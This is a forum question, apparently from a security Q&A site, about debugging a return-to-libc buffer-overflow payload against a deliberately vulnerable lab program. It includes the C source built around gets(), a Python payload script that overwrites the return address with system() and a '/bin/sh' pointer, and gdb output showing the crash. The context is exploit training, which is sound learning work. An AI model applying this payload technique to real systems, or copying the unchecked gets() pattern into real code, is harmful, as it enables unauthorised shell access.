# Unexplained bug with ROP exploitation

Tags: buffer-overflow

I currently am trying to exploit an example program with a return-to-libc exploit. The program is this one :

```
#include <stdlib.h>
#include <stdio.h>

/* gcc -fno-stack-protector -o lab5C lab5C.c */

char global_str[128];

/* reads a string, copies it to a global */
void copytoglobal()
{
    char buffer[128] = {0};
    gets(buffer);
    memcpy(global_str, buffer, 128);
}

int main()
{
    char buffer[128] = {0};

    printf("I included libc for you...\n"\
           "Can you ROP to system()?\n");

    copytoglobal();

    return EXIT_SUCCESS;
}
```

So I used gdb and got the adress of system().
Then I created an environnement variable SHELL="/bin/sh" which I could locate using gdb. (it was `0xffffdf91` so im using `0xffffdf97` because of the SHELL= part)
I then located where the return adress of copytoglobal was, and I figured it was 156 bytes after the beginning of the buffer

From there I wrote this little python script :

```
from __future__ import print_function
import sys

orig_stdout = sys.stdout
f = open('out.txt', 'w')
sys.stdout = f

print("A"*156, end='')

print("\xa0\x6f\xe2\xf7", end='') #system's adress read from p* system
print("ABCD", end='')         #errasing return adress with garbage
print("\x97\xdf\xff\xff")     #"/bin/sh"

sys.stdout = orig_stdout
f.close()
```

When i execute this in gdb with `r < out.txt` I get this output :
`Program received signal SIGSEV, Segmentation fault.
0x44434241 in ?? ()̀

So it seems like the program tries to execute the dummy ebp value, which is really strange, because I sat a breakpoint right before the `ret` call at the end of copytoglobal and that is how the stack looked like :

`0xffffdd1c:    0xf7e26fa0 #system() 0x44434241 #ABCD 0xffffdf97 #/bin/sh`

Using a breakpoint at the beginning of system() I can also say the program enters the system() function, but I really don't understand why it doesn't pop a shell and crashes before the end of system() (I tried to set a breakpoint right before the `ret` call at the end of system() but it is never reached)

Thanks in advance